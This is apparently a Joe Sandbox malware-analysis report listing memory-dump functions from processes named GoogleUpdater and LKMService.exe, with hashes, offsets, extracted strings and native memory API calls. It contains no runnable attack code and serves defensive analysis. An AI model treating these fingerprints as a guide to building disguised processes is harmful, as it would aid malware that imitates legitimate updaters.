Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9x=], xrefs: 0120B942
t~, xrefs: 0120BC92

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: 9x=]$t~
API String ID: 0-258036425
Opcode ID: d94495400b9be2bf644e79956f03b9e3306d6732fc25dff877c0729c70fd846c
Instruction ID: 1325716d9994a695e50aafa3dd77b463b286a1f0d77681ddc1e37c232437a32d
Opcode Fuzzy Hash: d94495400b9be2bf644e79956f03b9e3306d6732fc25dff877c0729c70fd846c
Instruction Fuzzy Hash: 6DD1A179B201218F8B59EB7DD85992D77F2AFCD71030541B8E906EB3A2DE60EC05CB91

Function 0120C480 Relevance: 1.6, Strings: 1, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~, xrefs: 0120C97A

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: t~
API String ID: 0-899910758
Opcode ID: b73efaa85a9836e5809a456e1b092dbb6527dcc6327272f2cb42c10da1771b9f
Instruction ID: 05f13386cee32ee0045f0933931f5e24604122c2e402655942f2e25a259a7cca
Opcode Fuzzy Hash: b73efaa85a9836e5809a456e1b092dbb6527dcc6327272f2cb42c10da1771b9f
Instruction Fuzzy Hash: 38D1E175B201268FCB0AEB6CC85557EB6E2FBC9310B0556A8E906FB3D2DA709D01C7D1

Function 050E5D49 Relevance: 1.6, APIs: 1, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 050E5DD9

Memory Dump Source

Source File: 00000003.00000002.4672090407.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50e0000_GoogleUpdater.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 675caa9e2a5cb87dbdfa2fe806d681f2da723da353483c2c488a2617f85bfcdd
Instruction ID: 0a8ba68a1b02abd9a44c1e999d4f362c66a1295099664a2e62eb700750f18c25
Opcode Fuzzy Hash: 675caa9e2a5cb87dbdfa2fe806d681f2da723da353483c2c488a2617f85bfcdd
Instruction Fuzzy Hash: 982113B1D013099FDB10CFAAD984A9EFBF5FF88310F20842AE519A7240D775A910CBA1

Function 050E5D50 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 050E5DD9

Memory Dump Source

Source File: 00000003.00000002.4672090407.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50e0000_GoogleUpdater.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d6a9be904b0bd9d1262b880de3ef424de649b11a4c96d5f62ea59e9f584b0238
Instruction ID: 81f6c436093be41846f865f6aed7d4db548cc682dd5a2981683127dbf12642ff
Opcode Fuzzy Hash: d6a9be904b0bd9d1262b880de3ef424de649b11a4c96d5f62ea59e9f584b0238
Instruction Fuzzy Hash: CA2100B1D013499FDB10DFAAD984ADEFBF5FF88310F20842AE519A7200C775A910CBA1

Function 050E6230 Relevance: 1.6, APIs: 1, Instructions: 61
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 050E62B3

Memory Dump Source

Source File: 00000003.00000002.4672090407.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50e0000_GoogleUpdater.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7c8199dff64c1ad39ed0c2e5606a2fe74ec6a4bf541df4fbe85a104813760148
Instruction ID: c5289abdb121bf451a5569d3c802170637a1216fbd6080477e41d94402026ce4
Opcode Fuzzy Hash: 7c8199dff64c1ad39ed0c2e5606a2fe74ec6a4bf541df4fbe85a104813760148
Instruction Fuzzy Hash: 2821E4B19003499FDF10DFAAD885ADEFBF5FF48310F10841AE519A7210C7759954CBA5

Function 01209187 Relevance: 1.5, Strings: 1, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1O^, xrefs: 01209443

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: 1O^
API String ID: 0-971112054
Opcode ID: 7a20cc852316708bb3a3413496d0777779ad89d0cc333940fe2385c2078db04a
Instruction ID: b7cfc75c0a78606842fe8611ede2abbed68b25ebddaec378edf5c2981d9ba713
Opcode Fuzzy Hash: 7a20cc852316708bb3a3413496d0777779ad89d0cc333940fe2385c2078db04a
Instruction Fuzzy Hash: 4DB11775E002099FDB58DFAAD451A9DBBF2FF98300B10C1AAE529E7351E7389A45CF10

Function 0120C1B8 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3G., xrefs: 0120C1DA

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: 3G.
API String ID: 0-3978388015
Opcode ID: 6a0958f42cd756e7cfcda01336abc5f1c41f3fcc08af44d362b8da02dc4291ee
Instruction ID: a6412e0bccc5e3c6961af75967d080799c5138673d32a69ab904679ecb065784
Opcode Fuzzy Hash: 6a0958f42cd756e7cfcda01336abc5f1c41f3fcc08af44d362b8da02dc4291ee
Instruction Fuzzy Hash: 6F51E373F201258FCB18DFACC49456DB6E6AF9821175642A9DD0AFB3A2DA35CC41CBC0

Function 01209AC5 Relevance: .4, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62dd168ffc820328e09636dea9177a3678eb6097544329e53a8af22b2fc76df2
Instruction ID: de75a608225332f9d401218616a7a4a53ac8d2559fb36664c73909fca189c7bc
Opcode Fuzzy Hash: 62dd168ffc820328e09636dea9177a3678eb6097544329e53a8af22b2fc76df2
Instruction Fuzzy Hash: 66F1F171B143158FDB15CF79C8D06ADBBF2BF99200B55826AE50AEB392DB709C85CB40

Function 01209028 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d89cb85d513f51ceac8bad1a8426f9e0067784dbcaef5bddfa01891a9ca16d1
Instruction ID: fb6f5a65c776d90f0a83dcdce68ac64024411d56fe4372471be911abab031d98
Opcode Fuzzy Hash: 5d89cb85d513f51ceac8bad1a8426f9e0067784dbcaef5bddfa01891a9ca16d1
Instruction Fuzzy Hash: 17314D77F205394B9B14CEADDC901AEB2E6AB8416070A823ADD4AEB792D574CC09C7D0

Function 0120E100 Relevance: 1.5, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%A?T, xrefs: 0120E1E6

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: %A?T
API String ID: 0-4079540278
Opcode ID: 07eb05fc3ef6d6c6bbe0715c9c5389f7fd51b666e8c34aa26ce3e41516d29836
Instruction ID: d52372b760f9c11b3ba15010e09d230bcee28a42ae635674156c1fc3341c7360
Opcode Fuzzy Hash: 07eb05fc3ef6d6c6bbe0715c9c5389f7fd51b666e8c34aa26ce3e41516d29836
Instruction Fuzzy Hash: 9A613531F001158FCB09EBBDC8544ADFBE6AFC921076A4569DA09FB3A6CE309D458B91

Function 01208D68 Relevance: 1.4, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~, xrefs: 01208D97

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: t~
API String ID: 0-899910758
Opcode ID: a5d81d44554ec6143c9a1f2549217eb893c859c5754b08b84187407686b6cae4
Instruction ID: cc3e6ff3677ab2334a3a094e4d43f280074c330b1a95e6227906938a87039ab1
Opcode Fuzzy Hash: a5d81d44554ec6143c9a1f2549217eb893c859c5754b08b84187407686b6cae4
Instruction Fuzzy Hash: AE416C35E2030ACFCB19CF69C49495EBBB2BF89310B148569E905AB362DB71EC46CB40

Function 0120BE08 Relevance: 1.3, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~, xrefs: 0120BE57

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: t~
API String ID: 0-899910758
Opcode ID: 5152940ec3556eacc4a5b961633f0d205bf64c436c9aabd53418bcb08920d6e7
Instruction ID: d12182452a38d22d0ba03c9aff616912e54ad87a2520f7965ce78e5214f33e19
Opcode Fuzzy Hash: 5152940ec3556eacc4a5b961633f0d205bf64c436c9aabd53418bcb08920d6e7
Instruction Fuzzy Hash: E211E531B152418FCB15DB78D8414AEBBB2BFC922472441BED508E7392DB359D46CB90

Function 0120BE18 Relevance: 1.3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~, xrefs: 0120BE57

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID: t~
API String ID: 0-899910758
Opcode ID: 71b110b7234f2fe97e1cab250fa6449a5cc6cc097a5498d5bec4ffff049adc33
Instruction ID: 94f90e57e9be1459287494d608c8be1c427ad9a9836912e97da51fd15a56f825
Opcode Fuzzy Hash: 71b110b7234f2fe97e1cab250fa6449a5cc6cc097a5498d5bec4ffff049adc33
Instruction Fuzzy Hash: 60017C75F101058F8B14DB69D84186EB7B2BBCD214B504169D918A7392DB31AD45CBA0

Function 0120AB78 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed00726355627600b03988cabe26641fc1cdbd96ada680582a2ca6775044be5f
Instruction ID: 33cc66891e00aa3e21e8482b84c002c2a727911bf808a2c88e906b143974aa53
Opcode Fuzzy Hash: ed00726355627600b03988cabe26641fc1cdbd96ada680582a2ca6775044be5f
Instruction Fuzzy Hash: C1410672F202298FDB15DE6CD88479DBAF2AB58310F564266D901FB3C2DA758C04CBD0

Function 01208E35 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a66d230ce4c027b1a944cd0126145b00b8dd746080604446c119e851d59b07b1
Instruction ID: f78224f4dc5c69a92e4bdc938a7a3dd6fe3960857755ac38fe928cbca6e29f56
Opcode Fuzzy Hash: a66d230ce4c027b1a944cd0126145b00b8dd746080604446c119e851d59b07b1
Instruction Fuzzy Hash: 7C412F35E2060ACFDB19CF68C484A5EBBB2BF59310F144569E505AB362DB71ED46CF40

Function 0120C3D8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c7533af33e08d670e7ea07c7944b9c3d1842145c686fd40e905592a2bb8b61
Instruction ID: ddd72e34460e1dad362d9cd5ee54d95ef1af6b7e248a7c6b4340ff42dd8c4ec0
Opcode Fuzzy Hash: c1c7533af33e08d670e7ea07c7944b9c3d1842145c686fd40e905592a2bb8b61
Instruction Fuzzy Hash: FC2156B6A1C3958FCB1387B998500AEBFB1AF8722071507E7C545EB2E7C6704C06C3A2

Function 0120A161 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55304a1cf662c2c97d2d03d968de39ae7abebb2928b6e8782711f100fe061ccc
Instruction ID: 71eea1bff35ef05a7f3f51c04ad49f2bffa71599127d02d69bfab0bef1b4f426
Opcode Fuzzy Hash: 55304a1cf662c2c97d2d03d968de39ae7abebb2928b6e8782711f100fe061ccc
Instruction Fuzzy Hash: 5631F873E112259FCB05DF7898044A9BBB2BB9536435A42ADD80AFB751C736DC42CBD0

Function 0120A170 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06e11623e5e0898eefa4b63fa7c8aafce13590cb5b8292440f46cc2bafac891
Instruction ID: 5a4cb24f86a144e6f16eea8fbf4963dfc5d47135fcb1482c5ab3bed68e69536d
Opcode Fuzzy Hash: b06e11623e5e0898eefa4b63fa7c8aafce13590cb5b8292440f46cc2bafac891
Instruction Fuzzy Hash: 13212873E11625DB8B049FB8D8044A9B7B2BB9436435A426DDC0AF7741C736DC41CBC0

Function 0120CCED Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75a0e3bc88b0093e8a4e98f0041ca3a845422b7e703d02c1c75c458a8ba93c5
Instruction ID: 0bf52b7e8faee1279ae6af75e11f11d01371d5dead625b13b20fd7959a1594d4
Opcode Fuzzy Hash: a75a0e3bc88b0093e8a4e98f0041ca3a845422b7e703d02c1c75c458a8ba93c5
Instruction Fuzzy Hash: 5311E3F67001650B8B4AB779741107C36C7DBCA62535816BEE20EEB3C3CE258E0743A6

Function 0120AEB0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb28192964f56358bd1d33506f9e206a8e228d07c01b73bab5405f21e0641646
Instruction ID: c4e7df79c70b8fe0686406dce9687d80c771315b9bb46f39da9f60560ab8629a
Opcode Fuzzy Hash: eb28192964f56358bd1d33506f9e206a8e228d07c01b73bab5405f21e0641646
Instruction Fuzzy Hash: 2811BE36B202258F8B44DF7CC89485ABBF6AF8921531541B9E906EB361EB30EC01CB90

Function 00E9D10D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4657063679.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e9d000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 278cd3074adfcec1da2504ec73ef39e13d4a164e21dc0317c852cdd41ad23563
Instruction ID: f7e47e3508ab1c62ed94262b335cda188e344681eda376fc977115a6f1afe0ef
Opcode Fuzzy Hash: 278cd3074adfcec1da2504ec73ef39e13d4a164e21dc0317c852cdd41ad23563
Instruction Fuzzy Hash: 8001A77240A354DAEB104A26CD847A7BF98EF41364F18D41AEE096A296C6799840C671

Function 00E9D10C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4657063679.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e9d000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f36509cbbfff281923aebae00ff3f01f2e7fece2ea4207fce60505d18842d6
Instruction ID: 8c98cdd09f8e3a124ea76f49bec23c885f2a951ee6ce148e0b7e73b9cb05942f
Opcode Fuzzy Hash: d4f36509cbbfff281923aebae00ff3f01f2e7fece2ea4207fce60505d18842d6
Instruction Fuzzy Hash: 49F0C272409354AAEB108A16CD84B63FF98EB81778F18C45AED085B296C3789C40CA71

Function 0120CC88 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db85c00b16a2743ba5ce178a6196b8e9b29c5280d4a270a6dbca218917fb60c0
Instruction ID: e5bf339df51af6808aef59a4c3a87fe6144c96551dba171e5ce463231eba7167
Opcode Fuzzy Hash: db85c00b16a2743ba5ce178a6196b8e9b29c5280d4a270a6dbca218917fb60c0
Instruction Fuzzy Hash: 6BF050312487518FC717A775EC1041E7FF2DEC62203458ABED14A97672DF681C06C7A1

Function 0120BD30 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea75cc37d9558f8e7a1672b4fc4cb2d2e34296a70c784f13518055df8132287
Instruction ID: 1bb9854c1c0eee3cebd585ffcc59e2672adae85681310dee9e2685ec67b5f416
Opcode Fuzzy Hash: 2ea75cc37d9558f8e7a1672b4fc4cb2d2e34296a70c784f13518055df8132287
Instruction Fuzzy Hash: 6FF03039310504CFC3299B2DC844C12BBE9EFCD72532695A9D60ADB776CA70EC41C751

Function 0120CF48 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3759e37aeb7ca14176e514e90d6127292877f8bffd23620f9d5ee446b7e02ad6
Instruction ID: 8d1a5c304a5ef68eea3149d5937da4f8bae7de02540a35bea845c4591402f7a8
Opcode Fuzzy Hash: 3759e37aeb7ca14176e514e90d6127292877f8bffd23620f9d5ee446b7e02ad6
Instruction Fuzzy Hash: BCE04F367106108F8729AB39D44082A73FAAFDA22535401BDE10ACB7B2CE71EC42CB90

Function 0120D950 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c82e6c4bd50144d0c35c1a9c2c594f8a15eddecb9cc5fb48fb8d4aa15b7412
Instruction ID: 2aa347613634cb5c658f20c9e52f4c5ec832166cb142680803caa71eb2d9b292
Opcode Fuzzy Hash: 34c82e6c4bd50144d0c35c1a9c2c594f8a15eddecb9cc5fb48fb8d4aa15b7412
Instruction Fuzzy Hash: 76E0E5316117108FC369AB39D404816B7E6AF9A22535145BDD40A9B761DA32EC45CB80

Function 0120D955 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa03c6c25f0615057738af062ff1fdd236f7b3199ab602c3314af7946dfb15e
Instruction ID: 3fcd85252c83f1869215437292730bda1ac8219c7e3738b6aff47c937fb954e4
Opcode Fuzzy Hash: caa03c6c25f0615057738af062ff1fdd236f7b3199ab602c3314af7946dfb15e
Instruction Fuzzy Hash: 2DE09235711A00CFC769EB35D058929B7E2AF9922536185ACD40A9BBA1DB32EC85CB40

Function 01200848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c5174dde02cdee82b3b1a5b6cc0f1efe49d2ef085a34015900e4c917417745
Instruction ID: 06bd3479870aedca23db27013e6a6f657bfac32205d65054fef315ff856fadbb
Opcode Fuzzy Hash: 76c5174dde02cdee82b3b1a5b6cc0f1efe49d2ef085a34015900e4c917417745
Instruction Fuzzy Hash: B2D01275A01208EF8704DFB5D94655D77F5EFCD300B1154A8E505F7240DA716E11AB51

Function 0120CFB0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44

Analysis Process: LKMService.exePID: 3172, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	23.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 02BB108A Relevance: 12.4, Strings: 4, Instructions: 7419COMMON

Download Yara Rule

Strings

9!7J, xrefs: 02BB741B
j'R, xrefs: 02BB414F
&03, xrefs: 02BB24ED
;.%, xrefs: 02BB4C97

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID: j'R$&03$9!7J$;.%
API String ID: 0-3501266285
Opcode ID: f49427b06f837deea5087b9a5a31f3e60142e2d66341eaea9b823fe822da3c87
Instruction ID: 73dfe3a3facc0be88cfb4b5272dce1245c7453bdb7f519384975d727d5bb5af7
Opcode Fuzzy Hash: f49427b06f837deea5087b9a5a31f3e60142e2d66341eaea9b823fe822da3c87
Instruction Fuzzy Hash: 0DE31B75E112298FDB68DF68C850A9EB3B2FB48204F5185E9D809F7750DB35AE81CF90

Function 02BB1098 Relevance: 12.4, Strings: 4, Instructions: 7414COMMON

Download Yara Rule

Strings

9!7J, xrefs: 02BB741B
j'R, xrefs: 02BB414F
&03, xrefs: 02BB24ED
;.%, xrefs: 02BB4C97

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID: j'R$&03$9!7J$;.%
API String ID: 0-3501266285
Opcode ID: fa0cd1611591321a54f011a8184fa20d698109490040fe882a7df7335ec823f7
Instruction ID: 48c2607a0f3ba917aaf248bf572b33e681f25069bc006c942c87bd2fb2023a74
Opcode Fuzzy Hash: fa0cd1611591321a54f011a8184fa20d698109490040fe882a7df7335ec823f7
Instruction Fuzzy Hash: F0E31B75E112298FDB68DF68C850A9EB3B2FB48204F5185E9D809F7750DB35AE81CF90

Function 02BBB7B8 Relevance: 1.6, Strings: 1, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9x=], xrefs: 02BBB942

Memory Dump Source

Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd

Similarity

API ID:
String ID: 9x=]
API String ID: 0-2310485032
Opcode ID: 09857c779ab38378662977312bd2cc4f1b9abba1bc9c298eb8c639203ebd2928
Instruction ID: a39eebd8c301eb9024bb4edcb01888fba2655bca53c2794a129d80c6d1ded4f0
Opcode Fuzzy Hash: 09857c779ab38378662977312bd2cc4f1b9abba1bc9c298eb8c639203ebd2928
Instruction Fuzzy Hash: D8D1AD79B101258F8B59EB6DC85897E77E2FF8C61830544A8ED07EB361DEA4DC02CB91

Function 052561F2 Relevance: 1.6, APIs: 1, Instructions: 88
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 052562B3

Memory Dump Source

Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e8c398a4c8c7e141440af9d1bc03dec15191772dc06c942d088b250a2ca11dfd
Instruction ID: 8a8eb84eb923ae50bcb0861c180cd9cf2ee210e24af408d4fd6d6171d648b07f
Opcode Fuzzy Hash: e8c398a4c8c7e141440af9d1bc03dec15191772dc06c942d088b250a2ca11dfd
Instruction Fuzzy Hash: 523169718053898FDB11CFA9C8856EEBFF0FF49310F54885AE945A7211CB78A916CB91

Function 05255D49 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05255DD9

Memory Dump Source

Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7cd27da85f804603831b1464bbb7c02a24af102a55ce23ae64d782a0c0849363
Instruction ID: bd821294318c1879acaa2c7ee5859b01c59c94748b752d65f85d921b58e35781
Opcode Fuzzy Hash: 7cd27da85f804603831b1464bbb7c02a24af102a55ce23ae64d782a0c0849363
Instruction Fuzzy Hash: 3921F4B1D0134A9FDB10CFA9D584ADEFBF1FF48310F20841AE519A7200C7759914CBA0

Function 05255D50 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

